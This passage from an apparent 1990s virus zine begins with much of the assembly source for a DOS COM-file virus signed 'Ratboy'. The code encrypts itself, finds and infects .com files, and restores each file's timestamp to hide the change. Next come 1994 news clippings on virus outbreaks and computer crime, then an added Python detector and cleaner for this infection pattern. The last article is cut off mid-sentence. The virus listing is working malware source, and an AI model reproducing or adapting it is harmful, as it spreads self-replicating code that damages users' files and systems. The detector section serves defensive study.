        jmp     restore                 ;now let's go virusing
writevirus:
        call    encryptdecrypt          ;encrypt the virus
        mov     ah,40h                  ;write the virus body
        mov     cx,offset endvx - offset startvx ;length of virus
        lea     dx,[bp + startvx]       ;where to start
        int     21h
        call    encryptdecrypt          ;now decrypt the body, since we
                                        ;can't work with an encrypted
                                        ;virus :(
        ret
encryptdecrypt:                         ;encryption routine
        mov     ax,word ptr [bp + encryptval] ;thanks Dark Angel for
        lea     si,[bp + encryptstart]  ;your virus writing
        mov     cx,(endvx - encryptstart + 1) / 2 ;guide :)
again:
        xor     word ptr [si],ax
        inc     si
        inc     si
        loop    again
        ret
encryptstart:
restore:
        mov     cx,4                    ;now let's restore the host.
        mov     di,100h                 ;move 4 bytes to the beginning
        push    di
        lea     si,[bp + orig_start]    ;where the bytes are
        rep     movsb                   ;do it 4 times
        lea     dx,[bp + endvx]         ;now let's set up a temp DTA in
        mov     ah,1ah                  ;the heap
        int     21h
        mov     ah,4eh                  ;find first
find_target:
        mov     cx,3fh                  ;attribute mask...any file
        lea     dx,[bp + file_type]     ;com file of course
        int     21h
        jc      quit                    ;no files? Then exit.
        jmp     file_ok                 ;a file. let's check it out
quit:
        mov     dx,80h                  ;let's restore the original DTA
        mov     ah,1ah                  ;now remember that di=100h and
        int     21h                     ;100h is on the stack. So ret
        ret                             ;will take us to 100h. Where
                                        ;real program is now.
file_ok:
        mov     ax,3d00h                ;open read only
        lea     dx,[bp + endvx + 1eh]   ;file's name
        int     21h
        xchg    bx,ax                   ;mov the file handle to bx
        mov     ax,word ptr [bp + endvx + 1ah] ;now we see if
        add     ax,offset endvx - startvx + 140h ;infecting it will
                                        ;make it too big
        jc      next_file               ;too big :( next file
        mov     cx,4                    ;now some reading. Quiet Please.
        lea     dx,[bp + orig_start]    ;put them in this buffer
        mov     ah,3fh
        int     21h
        cmp     byte ptr [bp + orig_start + 3],'d' ;check for id byte
        je      next_file               ;there? next file
        jmp     attack_file             ;not there! :) let's go to work!
next_file:
        mov     ah,3eh                  ;close file
        int     21h
        mov     ah,4fh                  ;load find next command
        jmp     find_target             ;let's do it again.
attack_file:
        mov     ax,4301h                ;now let's change the File's
        lea     dx,[bp + endvx + 1eh]   ;Attributes to nothing
        xor     cx,cx                   ;cx = 0
        int     21h
        mov     ax,word ptr [bp + endvx + 1ah] ;here we set up a new jmp
        sub     ax,3                    ;file size - 3 ( jmp )=
        mov     word ptr [bp + new_jump + 1],ax ;displacement
        mov     ah,3eh                  ;now let's close the file
        int     21h
        mov     ax,3d02h                ;now let's open the file
        int     21h                     ;for read/write access
        xchg    bx,ax                   ;file's handle into bx
        mov     cx,4                    ;now we'll copy the new jmp
        lea     dx,[bp + new_jump]      ;to the front of the file
        mov     ah,40h                  ;write command
        int     21h
        mov     ax,4202h                ;now move the file pointer to
        xor     dx,dx                   ;EOF. Remember a newly opened
        xor     cx,cx                   ;file. file pointer is at the
        int     21h                     ;BOF
        mov     word ptr [bp + encryptval],33h ;now we set up
                                        ;encryptval
        call    writevirus              ;let's append a Com file
        mov     ax,5701h                ;now let's restore the date
        mov     cx,word ptr [bp + endvx + 16h] ;and time of infected
        mov     dx,word ptr [bp + endvx + 18h] ;file ;)
        int     21h
        mov     ax,4301h                ;time to restore the file's
        lea     dx,word ptr [bp + endvx + 1eh] ;attributes
        mov     cx,word ptr [bp + endvx + 15h]
        int     21h
        sub     [bp + counter],1        ;one infection done -1
        cmp     [bp + counter],1        ;have done three infections?
        jne     next_file               ;nope? Oh goody ;)
        mov     ah,3eh                  ;close the file. we're done
        int     21h                     ;3 infections are enough
        jmp     quit
counter db      ?                       ;counter area...
file_type db    "*.com",0               ;file type. Duh...
orig_start db   0cdh,20h,7,8            ;will hold the host's first
                                        ;bytes
new_jump db     0e9h,?,?,'d'            ;new jump work area
dedication db   'To My Wife, Love Ratboy' ;to the loveliest
                                        ;woman in the world :)
endvx:                                  ;dta area in heap
startvx endp
code    ends
        end     main

* Thanks go out to Digital Justice for all this interesting info *

The Herald-Sun (Durham, N.C.)
October 29, 1994, Saturday
HEADLINE: Environmental testing delayed by computer virus

A computer virus has invaded a network at an Environmental Protection Agency lab in Research Triangle Park. The virus, which infected a network that links roughly 250 personal computers, kept employees in the EPA's Health Effects Research Lab from using the machines on Friday, said Ken Laws, an information systems chief for EPA.

The virus, known by the name 'Little Red,' has destroyed no data and has infected only a "small percentage" of the computers linked by the network, he added.

"At this point, we're still working on a resolution to the problem," Laws said Friday afternoon. "But we have identified a mechanism to detect and eliminate the virus and we are in the process of executing that now."

Late Thursday, evidence of the virus prompted EPA officials to shut down computer operations in the Health Effects lab, one of three EPA labs based in Durham's Research Triangle Park. Lab employees were told not to analyze data collected for environmental tests, use their word processors or send electronic messages.

Computer technicians plan to check every machine in the network to ensure the virus is eliminated, a process that could last a couple of days, Laws said. EPA officials aren't sure how the virus infected the computers, he added.

"I don't think it was any sabotage," Laws said. "This was not something that we think was a deliberate occurrence."
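Back to the RBENC listing (the Herald-Sun clipping sits between): the infection scheme it describes is simple enough to detect and undo from three facts in the source. The infector writes a 4-byte stub E9 xx xx 'd' at offset 0 with displacement = original file size - 3, so the jmp target is exactly where the appended body starts; before writing it XORs everything from encryptstart to endvx with the word 33h, so only every other byte is actually changed; and inside that encrypted range orig_start (the host's first four bytes), new_jump and the dedication string sit back to back. The following Python is an added example for this page, not code from the zine or from Ratboy. It tries both word alignments because the file offset of encryptstart is not known without assembling, and the "infected" sample it cleans is a constructed stand-in built by `build_sample`, not a real infected file.

```python
"""Detector and cleaner for the RBENC COM infection pattern described above.
Added example for this page; the sample image is constructed."""
import struct

KEY = 0x0033                                   # encryptval the infector writes before appending
ID_BYTE = ord('d')
MARKER = b'To My Wife, Love Ratboy'            # dedication string, 8 bytes after orig_start


def xor_words(data: bytes, key: int, parity: int) -> bytes:
    """Replay 'xor word ptr [si],ax' over data. parity says whether data[0] lines up
    with the low or the high byte of a key word (encryptstart's offset is unknown)."""
    lo, hi = key & 0xFF, key >> 8
    return bytes(b ^ (lo if (i + parity) % 2 == 0 else hi) for i, b in enumerate(data))


def find_rbenc(image: bytes):
    """Return (body_start, original_4_bytes) for an infected COM image, else None."""
    if len(image) < 8 or image[0] != 0xE9 or image[3] != ID_BYTE:
        return None
    rel = struct.unpack_from('<H', image, 1)[0]
    body_start = (rel + 3) & 0xFFFF            # E9 target = displacement + 3 = old file size
    if not 4 <= body_start < len(image):
        return None
    body = image[body_start:]
    for parity in (0, 1):
        plain = xor_words(body, KEY, parity)
        pos = plain.find(MARKER)
        # layout inside the encrypted range: orig_start(4) new_jump(E9 ?? ?? 'd') dedication
        if pos >= 8 and plain[pos - 4] == 0xE9 and plain[pos - 1] == ID_BYTE:
            return body_start, plain[pos - 8:pos - 4]
    return None


def disinfect(image: bytes) -> bytes:
    """Put the saved first four bytes back and drop the appended body."""
    hit = find_rbenc(image)
    if hit is None:
        return image
    body_start, orig = hit
    return orig + image[4:body_start]


def build_sample(host: bytes) -> bytes:
    """Constructed stand-in for an infected file: stub at offset 0, then a fake body whose
    tail (orig_start, new_jump, dedication) is XOR-encrypted the way the listing does it.
    The 5-byte plaintext prefix stands in for the code that precedes encryptstart."""
    rel = (len(host) - 3) & 0xFFFF
    stub = bytes([0xE9]) + struct.pack('<H', rel) + b'd'
    prefix = b'\xE8\x00\x00\x5D\x90'           # odd length, so the tail starts on a high key byte
    tail = host[:4] + stub + MARKER
    return stub + host[4:] + prefix + xor_words(tail, KEY, 0)


HOST = b'\xB4\x09\xBA\x08\x01\xCD\x21\xC3'     # constructed 8-byte COM: mov ah,9 / mov dx,108h / int 21h / ret

if __name__ == '__main__':
    sample = build_sample(HOST)
    print(find_rbenc(sample), disinfect(sample) == HOST)
```

Two caveats follow directly from the listing. The infector only ever checks byte 3 for 'd', so any COM that happens to have a 'd' there is immune and, conversely, the generation-zero dropper (nop nop nop 'd') never starts with E9 and is not matched by `find_rbenc`; a scanner that keys on the marker string alone would catch it. And because the high key byte is 00h, half the appended body is stored in the clear, which is why trying both alignments is enough to recover the dedication and the saved host bytes without knowing the assembled offsets.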
Copyright 1994 The Financial Times Limited; Financial Times
October 13, 1994, Thursday
HEADLINE: Computer fraud rises sharply

Attacks on public-sector and private-sector computer systems by thieves, hackers and virus writers have increased dramatically in the past three years, the Audit Commission said yesterday.

The rise is a consequence of the spread of personal computers and networks but also the result of managers neglecting or refusing to put into practice measures which could contain or reduce computer fraud and hacking.

The commission says the total value of losses caused by computer abuse has risen 183 per cent since the last survey - the average loss per incident caused through fraud is now Pounds 28,170.

The study - involving returns from more than 1,000 companies - shows that the number of incidents of computer abuse reported has increased from 12 per cent of organisations canvassed in 1991 to 36 per cent. There has also been a 38 per cent increase in reported fraud and an eightfold rise in the use of illicitly obtained software.

Incidents reported to the commission range from an employee who gained access to her own and her husband's debt records and reduced them, to a nurse who hacked into a hospital's computer system and prescribed potentially lethal drugs for one patient and altered treatment records for others.

The figures almost certainly understate the problem - organisations are notoriously shy of admitting incidents.

Management, it says, does not impose adequate controls. It found almost 25 per cent of organisations had no internal auditing procedures, 60 per cent did not carry out security awareness training, 50 per cent had no computer audit skills and more than 80 per cent did not practise risk analysis.
Copyright 1994 The National Underwriter Company National Underwriter, Life & Health/Financial Services Edition October 10, 1994 HEADLINE: Virus Control Guide Targets Hackers And Pros A guide to understanding and controlling computer viruses is now available under a joint program between the National Computer Security Association and 3M Co. "How to Avoid Computer Viruses" is a pocket-size, illustrated 20-page brochure written for computer users of all levels of experience. Complete with detailed questions and answers, tables and charts, the new brochure aims to separate myth from fact about this often misunderstood aspect of computing. Organized in a multi-panel, graphical format, the brochure uses simple language to explain what a computer virus is, how they spread, how to distinguish a virus from a computer's "virus-like" behavior, and how to prevent an infection as well as eradicate one after it strikes. The brochure offers tips and insights on coping with boot-sector and file-infecting viruses; understanding logic bombs, time bombs, Trojan horses and worms; what to look for and when to use anti-virus software; how virus behavior varies from PCs to Macs to local area networks; recommended backup techniques; and how to ensure new diskettes are virus free. Citing recent research by Dataquest Inc. of San Jose, Calif., and Carlisle, Pa.-based NCSA, the booklet notes, "Nobody knows the total price tag for crimes by virus authors, but it's estimated in the billions of dollars. A serious virus infection can put the user out of business from a few days up to a month." Karen Greco, market development manager in 3M's Data Storage Markets Division, St. Paul, Minn., said, "3M and NCSA are reaching out to business and home computer users with practical advice on how to deal with computer viruses. Awareness is the first step in building a good defense." 
"NCSA has long advocated that companies establish in-house computer virus policies that will educate employees and equip them with protective measures," said Bob Bales, NCSA executive director.

"Certainly, not all viruses are equal," Mr. Bales said. "The pernicious 'Michelangelo' virus, which wipes out hard disk information, is nothing like the relatively harmless tune-playing 'Yankee Doodle' virus.

"The 3M/NCSA guide will enable users to understand the often perplexing ways viruses behave and detect them before it's too late."

He said the brochure complements NCSA's new dedicated Virus Help line to provide technical support to users who think their computer may have been infected by a virus. The service costs $ 1.95 a minute. Call 900-555-6272 weekdays between 9 a.m.-5 p.m. Eastern time.

The brochure is available by printing a name and address on a 3X5 card and mailing it with a $ 2 check or money order to 3M Virus Brochure, PO Box 8031, Young-America, Minn., 55551-8031.

Two on-line services also carry the guide, without tables and charts. One is a dedicated Computer Security Forum on CompuServe, installed by NCSA. The go command is GONCSA. The other is for Delphi subscribers, who may access the document on the Computing Menu.

Copyright 1994 Globe Newspaper Company
The Boston Globe
October 7, 1994, Friday, City Edition
HEADLINE: You need to treat viruses immediately

My computer picked up a virus last week, and it just made me sick. It's not so much the damage done; in this case I suffered the loss of files on only a couple of disks. But getting rid of a computer virus is a nuisance that demands immediate attention, no matter how important or pressing the work you might be doing at the moment. It's drudgery and almost wholly unrewarding. I can't imagine what conceivable satisfaction a hacker gets from writing and spreading a bit of code that wrecks the workdays and playtime of thousands of people the saboteur doesn't even know.
But it happens all the time, and if you use a computer, it could happen to you. This is a recommendation that you obtain a good virus scanner and shield program and update them regularly, at least once a year. The nefarious worms who concoct these artificial bugs are constantly trying to build stealthier invaders to elude the programs written to detect and disable them. My latest encounter was with something called NewBug, a virus that invades the boot sector of an ordinary floppy disk. It is not held in particularly high regard by people who study the sophistication of these products, but it is trouble nonetheless. I discovered it when trying to install a new program on my hard disk drive using the original disks sent from the program's developer. It was a Windows program, and every time I attempted to execute the "a:install" command, the little hourglass symbol on the screen would change color and the machine would freeze solid. I suspected a faulty disk or installation program. Having encountered viruses before, I always start up my computer with a sentinel program that is supposed to check for infections when the machine "boots up" and whenever the computer addresses a new disk, such as the floppy I was trying to use. But in this case, the machine locked up before signaling the source of the problem. When I called the software developer of the program I was trying to install, I was advised to check for viruses. The company had encountered these symptoms before. The person I spoke to was confident the disks were not infected when they were sent to me and suggested I may have inadvertently downloaded an infected file from the Internet. I was skeptical, but did as he suggested. I first checked all six of the suspect floppy disks with a program called Microsoft Anti-Virus for Windows, which had come installed on my computer when it was delivered less than a year ago. It detected nothing. 
I then ran an old version of McAfee Associates' Viruscan, which I happened to have on hand. It had helped identify a "Yankee Doodle" infection in 1990 and had proved useful on at least two subsequent occasions. This time it came up blank. Dialing up a commercial online service, I downloaded the latest McAfee product, and sure enough, it identified NewBugGenb on the suspect floppies. Cleaning those disks was no problem, and fortunately, my hard drive tested clean, indicating NewBug had not succeeded in jumping from the floppy disk into my computer's innards, where it can hide in the partition table of the hard drive and cause sporadic behavior problems. To prevent reinfection, however, it is necessary to scan every floppy disk around and, in my case, two other PCs I had used recently. One of the computers, a laptop I had received on loan and had not armed with the virus sentinel, contained a "Genp" virus, indicating the bug had successfully migrated from the boot sector of a floppy disk to the partition table of the laptop's internal hard disk. It is conceivable the machine was infected when I received it and was transferring the virus to floppies when I installed programs on it. I could not be sure. I found several more infected floppy disks in my collection and, when running a program to purge the virus, ruined the files on two of them. Perhaps if one kept a careful enough log, it would be possible to determine which floppy disk had been run on which machine on what date and thereby trace the bug to its earliest appearance. Without such meticulous written records, I quickly became confused about when I had loaded a specific program on a particular machine and could not pinpoint where I caught the bug. Perhaps the virus writer will now take some pleasure in having wasted hours of my time. It takes all kinds. Who sells antivirus software Major developers of antivirus software distribute their products through computer stores, online services and direct mail. 
They include:

- McAfee Associates (408) 988-3832.
- Symantec Corp., publisher of Norton Antivirus, (408) 253-9600.
- Central Point Software, now a division of Symantec and publisher of Microsoft Anti-Virus, (503) 690-8088.

These companies and other virus-fighting organizations also may be contacted online through the major commercial online services. Another source of information about computer viruses and what to do about them is the National Computer Security Association (717) 258-1816.

Copyright 1994 The Times Journal Company
Defense News
October 3, 1994 / October 9, 1994
HEADLINE: Organized Crime Hackers Jeopardize Security of U.S.

Technically savvy organized crime networks, most predominantly in Russia, now potentially pose a greater threat to U.S. national security than legitimate governments that harbor anti-American sentiments, say government and intelligence officials.

While the Pentagon makes plans to fight and win two simultaneous regional conflicts, the real threat to American interests lies in the ability of criminals to infiltrate and destroy the U.S. financial and information systems, Scott Charney, chief of the Computer Crimes Unit, Department of Justice, said Sept. 26 at a conference here sponsored by the Center for Strategic and International Studies.

Charney said the yearly cost of computer crimes in the United States is between $ 500 million and $ 5 billion, but no one knows for sure. The real problems are about to begin, as the hackers